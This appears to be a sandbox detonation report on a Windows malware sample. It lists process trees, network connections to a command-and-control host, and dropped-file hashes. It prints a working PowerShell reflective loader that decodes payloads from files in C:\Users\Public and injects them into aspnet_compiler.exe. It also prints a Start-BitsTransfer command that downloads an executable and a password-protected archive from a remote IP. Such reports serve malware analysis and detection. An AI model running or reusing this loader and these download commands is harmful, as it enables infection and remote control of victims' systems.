powershell.exe -Command "Function FH([String] $Jxxxe) {$JS = [System.Collections.Generic.List[Byte]]::new();for ($i = 0; $i -lt $Jxxxe.Length; $i +=8) {$JS.Add([Convert]::ToByte($Jxxxe.Substring($i, 8), 2));}return [System.Text.Encoding]::ASCII.GetString($JS.ToArray());};function fromHex { param([string] $str)$hex = $str.Split(' '); $result = New-Object 'byte[]' ($hex.Count / 2);$count = 0; for ($i = 0; $i -lt $hex.Count - 1; $i += 2){ $result[$count] = [byte]($hex[$i]); $count++;}return $result };$msg = (Get-Content -Path 'C:\Users\Public\msg.txt');$runpe = (Get-Content -Path 'C:\Users\Public\runpe.txt');$result = fromHex $msg;$runpeD = fromHex $runpe;$new = (Get-Content -Path 'C:\Users\Public\NewPE2.txt');$Execute = (Get-Content -Path 'C:\Users\Public\Execute.txt');$Invoke = (Get-Content -Path 'C:\Users\Public\Invoke.txt');$Framework = FH(Get-Content -Path 'C:\Users\Public\Framework.txt');$load = (Get-Content -Path 'C:\Users\Public\load.txt');$ype = (Get-Content -Path 'C:\Users\Public\Gettype.txt');$getM = (Get-Content -Path 'C:\Users\Public\getMethod.txt');[Reflection.Assembly]::$load([Byte[]]$runpeD).$ype($new).$getM($Execute).$Invoke($null,[Object[]]($Framework,$null,[Byte[]]$result,$true)); Stop-Process -Name 'node'"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
C:\Windows\System32\WScript.exe
C:\Windows\System32\WScript.exe "C:\\Users\\Public\\app.js"
C:\Users\Public\node.exe
"C:\Users\Public\node.exe" C:\Users\Public\run.js
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /s /c "powershell.exe -Command "Function FH([String] $Jxxxe) {$JS = [System.Collections.Generic.List[Byte]]::new();for ($i = 0; $i -lt $Jxxxe.Length; $i +=8) {$JS.Add([Convert]::ToByte($Jxxxe.Substring($i, 8), 2));}return [System.Text.Encoding]::ASCII.GetString($JS.ToArray());};function fromHex { param([string] $str)$hex = $str.Split(' '); $result = New-Object 'byte[]' ($hex.Count / 2);$count = 0; for ($i = 0; $i -lt $hex.Count - 1; $i += 2){ $result[$count] = [byte]($hex[$i]); $count++;}return $result };$msg = (Get-Content -Path 'C:\Users\Public\msg.txt');$runpe = (Get-Content -Path 'C:\Users\Public\runpe.txt');$result = fromHex $msg;$runpeD = fromHex $runpe;$new = (Get-Content -Path 'C:\Users\Public\NewPE2.txt');$Execute = (Get-Content -Path 'C:\Users\Public\Execute.txt');$Invoke = (Get-Content -Path 'C:\Users\Public\Invoke.txt');$Framework = FH(Get-Content -Path 'C:\Users\Public\Framework.txt');$load = (Get-Content -Path 'C:\Users\Public\load.txt');$ype = (Get-Content -Path 'C:\Users\Public\Gettype.txt');$getM = (Get-Content -Path 'C:\Users\Public\getMethod.txt');[Reflection.Assembly]::$load([Byte[]]$runpeD).$ype($new).$getM($Execute).$Invoke($null,[Object[]]($Framework,$null,[Byte[]]$result,$true)); Stop-Process -Name 'node'""
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -Command "Function FH([String] $Jxxxe) {$JS = [System.Collections.Generic.List[Byte]]::new();for ($i = 0; $i -lt $Jxxxe.Length; $i +=8) {$JS.Add([Convert]::ToByte($Jxxxe.Substring($i, 8), 2));}return [System.Text.Encoding]::ASCII.GetString($JS.ToArray());};function fromHex { param([string] $str)$hex = $str.Split(' '); $result = New-Object 'byte[]' ($hex.Count / 2);$count = 0; for ($i = 0; $i -lt $hex.Count - 1; $i += 2){ $result[$count] = [byte]($hex[$i]); $count++;}return $result };$msg = (Get-Content -Path 'C:\Users\Public\msg.txt');$runpe = (Get-Content -Path 'C:\Users\Public\runpe.txt');$result = fromHex $msg;$runpeD = fromHex $runpe;$new = (Get-Content -Path 'C:\Users\Public\NewPE2.txt');$Execute = (Get-Content -Path 'C:\Users\Public\Execute.txt');$Invoke = (Get-Content -Path 'C:\Users\Public\Invoke.txt');$Framework = FH(Get-Content -Path 'C:\Users\Public\Framework.txt');$load = (Get-Content -Path 'C:\Users\Public\load.txt');$ype = (Get-Content -Path 'C:\Users\Public\Gettype.txt');$getM = (Get-Content -Path 'C:\Users\Public\getMethod.txt');[Reflection.Assembly]::$load([Byte[]]$runpeD).$ype($new).$getM($Execute).$Invoke($null,[Object[]]($Framework,$null,[Byte[]]$result,$true)); Stop-Process -Name 'node'"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
Network
| Country | Destination | Domain | Proto |
| NL | 52.142.223.178:80 | tcp | |
| UA | 176.107.185.29:666 | 176.107.185.29 | tcp |
| US | 8.8.8.8:53 | 29.185.107.176.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.17.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 5.181.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| UA | 176.107.185.29:666 | 176.107.185.29 | tcp |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | nodejs.org | udp |
| US | 104.20.23.46:443 | nodejs.org | tcp |
| US | 8.8.8.8:53 | 46.23.20.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.126.166.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | win0090.theworkpc.com | udp |
| NL | 91.92.250.202:5010 | win0090.theworkpc.com | tcp |
| US | 8.8.8.8:53 | 0.205.248.87.in-addr.arpa | udp |
| NL | 91.92.250.202:6606 | win0090.theworkpc.com | tcp |
| US | 8.8.8.8:53 | 202.250.92.91.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 16.234.44.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 81.171.91.138.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 22.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 23.173.189.20.in-addr.arpa | udp |
Files
memory/1056-3-0x0000023F73DD0000-0x0000023F73DF2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ldeenixo.bjp.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/1056-13-0x00007FFB516C0000-0x00007FFB52181000-memory.dmp
memory/1056-15-0x0000023F71CE0000-0x0000023F71CF0000-memory.dmp
memory/1056-14-0x0000023F71CE0000-0x0000023F71CF0000-memory.dmp
memory/1056-16-0x0000023F73F60000-0x0000023F73F86000-memory.dmp
memory/1056-17-0x0000023F73FB0000-0x0000023F73FC4000-memory.dmp
memory/1056-20-0x00007FFB516C0000-0x00007FFB52181000-memory.dmp
C:\Users\Public\basta.js
| MD5 | acc80e9a87c6fa26564d11ba56eb1529 |
| SHA1 | bc7fd2c2afae4511618c540a827cd3263e4df4fb |
| SHA256 | f9f6b12f1afd646a4822f11eb2c84533c4afab06162c84dd184b20eae3f40ebe |
| SHA512 | caa4b016b9062a1b39d5e4981aa6104f1a10f3d0a855b83d2f6d6f49d1aa05f4e63b4f81ee3b7fb1009cb003478834e014d8807fa793820535c3cce03bfb6500 |
C:\Users\Public\node.bat
| MD5 | 15333bb0cc252086e87ad2aea347d684 |
| SHA1 | 303efa040dd58b5d27bd884bab31cabcd7030315 |
| SHA256 | 7db89368b3daa954c91364203c177d469fbc56d09b69acf71116b3f0eeffd657 |
| SHA512 | d7308fbeacbf4a1c807850aa19c888a79feeed023fcfa872751d7bc60ab8afb7d631bbb5d3819da3b5882ed642a30604451d9eed62927b87fb813c27c12a24db |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | 61e2e57471d559f5f6813c0a7995c075 |
| SHA1 | 33c621541bc0892ddab1b65345a348c14af566e5 |
| SHA256 | c1acff9ad0b9cbb4f83f7953ec66d2ac7c37a6fa4a1474430fc1b04ad049231d |
| SHA512 | 9fb42b4b261b4114d113b7ea96ef33a0bade598332361499b97e5b92b72895f287f753d62d26ad86573ab9f56f1b052d2d4c61a4ccf287ef7d8e1c9363353a5c |
memory/208-61-0x00007FFB516C0000-0x00007FFB52181000-memory.dmp
memory/208-62-0x000001D5734A0000-0x000001D5734B0000-memory.dmp
memory/208-63-0x000001D5734A0000-0x000001D5734B0000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | abf9290793799558a17b4643d3114d6a |
| SHA1 | ad1cfae3a1fd1aae092cf3401abb0ba7c01de566 |
| SHA256 | 079ab91d9e2efefd728a33fe628723b322f3a107971426e77ff8ac2ea4a25239 |
| SHA512 | 3667037a1ac952a77bdea0587dc0b61ac598c351006be1c1e27d049be89f73d654150a5ab1f6aa76973d2c994e937e2990ffbad26f8e9f976262165523588ea5 |
memory/208-65-0x000001D575760000-0x000001D575786000-memory.dmp
memory/208-67-0x00007FFB516C0000-0x00007FFB52181000-memory.dmp
memory/952-68-0x00007FFB516C0000-0x00007FFB52181000-memory.dmp
memory/952-69-0x0000020F89D10000-0x0000020F89D20000-memory.dmp
memory/952-70-0x0000020F89D10000-0x0000020F89D20000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 925fe1c1bdc356a1bd515e00e0a0bc92 |
| SHA1 | 82a4be87b3ee4159bf94826abc30dca694709066 |
| SHA256 | 169b3424a0d021a30db7bb0e5c805c076f5c5b902b2bc90394a31999bc28ee36 |
| SHA512 | d4e1ab6d5649e384778deee664872e6ba2f52c5e06c4e7526cdceee8415b339377df4a71099458b270da8a217648665873e6a0176e75cedb30513158197177e5 |
memory/952-82-0x00007FFB516C0000-0x00007FFB52181000-memory.dmp
C:\Users\Public\app.js
| MD5 | 08a7e6db996774b6806c395c04116803 |
| SHA1 | d0182c34dacc8ab9c8841c8913a1ae7f4d281595 |
| SHA256 | 9268b265b1de1e39454bc0276b85e56e3e1763526a972bfc60a3bbb533192bdc |
| SHA512 | d3191ac299738e2b01edda769da6462df9f292bfe033cc26aeb317d47e04948d56e52eeef19c1d82c31e8f213c7547504e42f354c4c417b9e17aec7c6154e43b |
C:\Users\Public\run.js
| MD5 | ea7771c6e2cd4c1e9b1f00f233764a8c |
| SHA1 | 69fc45ead32fe3749e6b1e2a6eaf6ade10e0379d |
| SHA256 | f2065f51a038146796411358d464c9e0a4ec2c5ba89d1157c588ac2175cb1122 |
| SHA512 | 32c88a76ce6cbaa15531138209a8b644f297264a0b7e3f79a2a0ae88e93793ba88eb95fc7e8cd52b884afa426a93ada3682425afba93098114622aa22d5b1ba1 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 791b8919ee1945aee3ab0ecc7bac2a69 |
| SHA1 | 42be67583f1a30f60bedba70b5829343e633c091 |
| SHA256 | 46c98d0027f2503be59804146cb2265a2299e8e83afafabfaca5c45eec6e16fb |
| SHA512 | caa2c1d16d2359c0ff643aa18d4dbe5653b040b7d56e9afa43734408934b2357d699827ffbb4b8bd0b6a057915ebe911ea42970cbecdd0ecb4c1455bff1ed823 |
memory/2772-96-0x00007FFB516C0000-0x00007FFB52181000-memory.dmp
memory/2772-97-0x000001BDC5DA0000-0x000001BDC5DB0000-memory.dmp
memory/2772-99-0x000001BDC5DA0000-0x000001BDC5DB0000-memory.dmp
memory/2772-98-0x000001BDC5DA0000-0x000001BDC5DB0000-memory.dmp
C:\Users\Public\msg.txt
| MD5 | 57ece7de9ff20214d5949a1a31114d06 |
| SHA1 | 046a95241bbd0dd825dd8738e5c6ccf5f887ba19 |
| SHA256 | c0f52718e1f62533b1e9fb6b4635f59023abe58ede410de7481cd4be6c20eb0f |
| SHA512 | 32004c2e1c748e1e46aa8da74634fe9510ee9d93a3a3d46bb65c9d8444579429706099e6ea42f8a95f9841652f850ecade0d8c3c9324057822b246793f300f6c |
C:\Users\Public\runpe.txt
| MD5 | 5484b3b6ed63609cb1123976a3394c9a |
| SHA1 | 9535add105a42a49171c0973a1f9c55a872fc0b5 |
| SHA256 | 7b841fe29eab8eee796195c2b269acf517c57dd1fd9ebb565c1266497a7b1fb9 |
| SHA512 | 0a7973485f58a8d700c01c72dba3f976a02af6f4da97d2109df64168b0dd926024eaf60d740c67707a3b13d115c14cfaaa876242ad42cd012c74a9069ad92453 |
C:\Users\Public\NewPE2.txt
| MD5 | 8a56a0e23dbfe7a50c5ec927b73ec5f2 |
| SHA1 | abebd513e68e63e7ec6ae56327c232b6e444ce0a |
| SHA256 | 3b348b38ac24e5e26423cc6d46936e7a4fdedda9d4aa89fdb2cfde4fad662cc1 |
| SHA512 | 276fc17efa7fef658167a94f22c76ae2abb6768d40702a39f970f196099058139249b8e12f18569f7f42f03f581f2543e49f39ab41553dd38d85511558a77ed2 |
C:\Users\Public\Framework.txt
| MD5 | 6a08392ecf95df7fc91917dcfaae8da6 |
| SHA1 | 480f6a5c761e1a069c0d68f5ac2aabf727791393 |
| SHA256 | 0a572ee5508d9310936801a04237d56f118dff4dbaa98f60070988cc4b8ca460 |
| SHA512 | d70c436183a9c6f6d4ce9296dce846f94cd12d7fbb76b24e59d88a77349a95a7a0d6ad8f9f4ffc32a98618b3250e0d35e4cf9ff1e711f4e63ffee425597dfc5e |
C:\Users\Public\Invoke.txt
| MD5 | 5fb833d20ef9f93596f4117a81523536 |
| SHA1 | d6aa1f3a789f3f3108666e0ac807ca5ca7dc5fa5 |
| SHA256 | e77f5b9f691679ef6fa67d3ec953199b1696cf6a0e77741c035f11aadfd9bf73 |
| SHA512 | afaec35da2440502779227d9436570db82e1f5d86c90662eae82564d717407518d4e1181e024566e2d8d6029bd4e738b9ba4a3108753a8d0d0c98934db94ba35 |
C:\Users\Public\Execute.txt
| MD5 | 40cd014b7b6251e3a22e6a45a73a64e1 |
| SHA1 | 6ea36ce8d4940505e9a2c8fea5db868cd8b3d440 |
| SHA256 | e3a67d9540e9a204f7dc4aa9d44a0ec652856cfa932a21196bf9df23aa0e4cd1 |
| SHA512 | 776d4496cc76782961d66f235ff257567e12e85b950101247fb29de911a4e44048398932f2881b5610cbad6c90fe1c4e99f346cc7d315d7b9a612c89b19b42ea |
C:\Users\Public\getMethod.txt
| MD5 | db37f91f128a82062af0f39f649ea122 |
| SHA1 | f21110ae7ac7cde74e7aa59b22ed10bace35b06b |
| SHA256 | e53ba77fa1dbcb1cc3beed1344f6ae7b182d6a2e2a09bb32ec0d4474978e4a32 |
| SHA512 | 681c5c69acba8c2b327afd0bcb1062fb5f6ee3231e6b95f4cd97ecd768879250eb81d36b1e1640554a85002a7b2b099acfe7f59f70884f10afd51d372583d3ae |
C:\Users\Public\Gettype.txt
| MD5 | 9221b7b54ed96de7281d31f8ae35be6a |
| SHA1 | 223fad426aa8c753546501b0643ee1720b57bff0 |
| SHA256 | 8eab5c7c6d1116d28014f0da7b7e78b9857da1e6f951b903f2a714fc6d3c790a |
| SHA512 | be37de186628a2c30698a6d4826ec5f8845e7b69317b2f044e86fae615c263a5fd179fcbc50821c85b49c9e3e71adb10a947060312da281418c8ca231d656d5d |
C:\Users\Public\load.txt
| MD5 | ec4d1eb36b22d19728e9d1d23ca84d1c |
| SHA1 | 5dbc716c4600097b85b9e51d6aeb77a4363b03ed |
| SHA256 | 0cf67fc72b3c86c7a454f6d86b43ed245a8e491d0e5288d4da8c7ff43a7bcdb0 |
| SHA512 | d67f0ffb682d7a13510ec5d3e643889d43bc7593429f806fd882b2c72c05a530c2462d332d4293015f33397cdec84c53d1eea58a7bebaab5504153729df02700 |
memory/2772-109-0x000001BDC80E0000-0x000001BDC8132000-memory.dmp
memory/480-110-0x0000000000400000-0x0000000000416000-memory.dmp
memory/2772-112-0x00007FFB516C0000-0x00007FFB52181000-memory.dmp
memory/480-113-0x0000000075030000-0x00000000757E0000-memory.dmp
memory/480-114-0x0000000005490000-0x00000000054A0000-memory.dmp
memory/480-115-0x0000000005E50000-0x00000000063F4000-memory.dmp
memory/480-116-0x0000000005A80000-0x0000000005B12000-memory.dmp
memory/480-117-0x0000000005A60000-0x0000000005A6A000-memory.dmp
memory/480-120-0x0000000006A40000-0x0000000006ADC000-memory.dmp
memory/480-121-0x0000000006840000-0x00000000068A6000-memory.dmp
memory/480-122-0x0000000075030000-0x00000000757E0000-memory.dmp
memory/480-123-0x0000000005490000-0x00000000054A0000-memory.dmp
memory/2772-124-0x00007FFB516C0000-0x00007FFB52181000-memory.dmp
memory/2772-125-0x0000019672180000-0x0000019672190000-memory.dmp
memory/2772-126-0x0000019672180000-0x0000019672190000-memory.dmp
memory/2772-137-0x0000019672180000-0x0000019672190000-memory.dmp
memory/4960-139-0x0000000075030000-0x00000000757E0000-memory.dmp
memory/2772-142-0x00007FFB516C0000-0x00007FFB52181000-memory.dmp
memory/4960-143-0x0000000005100000-0x0000000005110000-memory.dmp
memory/4960-145-0x0000000075030000-0x00000000757E0000-memory.dmp
Analysis: behavioral5
Detonation Overview
Submitted
2024-01-22 21:29
Reported
2024-01-22 21:32
Platform
win7-20231215-en
Max time kernel
117s
Max time network
120s
Command Line
Signatures
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WScript.exe | N/A |
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2236 wrote to memory of 2444 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 2236 wrote to memory of 2444 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 2236 wrote to memory of 2444 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 2236 wrote to memory of 2572 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\cmd.exe |
| PID 2236 wrote to memory of 2572 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\cmd.exe |
| PID 2236 wrote to memory of 2572 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\cmd.exe |
Processes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\PR0FlT&L0SS_2O23.wsf"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "Start-BitsTransfer -Source 'http://176.107.185.29:666/Rar.jpg' -Destination 'C:\Users\Public\Rar.exe'; Start-BitsTransfer -Source 'http://176.107.185.29:666/load.rar' -Destination 'C:\Users\Public\load.rar'"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c Rar.exe x -p111 load.rar
Network
| Country | Destination | Domain | Proto |
| UA | 176.107.185.29:666 | 176.107.185.29 | tcp |
Files
memory/2444-7-0x000000001B320000-0x000000001B602000-memory.dmp
memory/2444-8-0x0000000001DE0000-0x0000000001DE8000-memory.dmp
memory/2444-9-0x000007FEF56E0000-0x000007FEF607D000-memory.dmp
memory/2444-10-0x0000000002910000-0x0000000002990000-memory.dmp
memory/2444-11-0x0000000002910000-0x0000000002990000-memory.dmp
memory/2444-12-0x0000000002910000-0x0000000002990000-memory.dmp
memory/2444-13-0x000007FEF56E0000-0x000007FEF607D000-memory.dmp
memory/2444-14-0x0000000002910000-0x0000000002990000-memory.dmp
memory/2444-15-0x000007FEF56E0000-0x000007FEF607D000-memory.dmp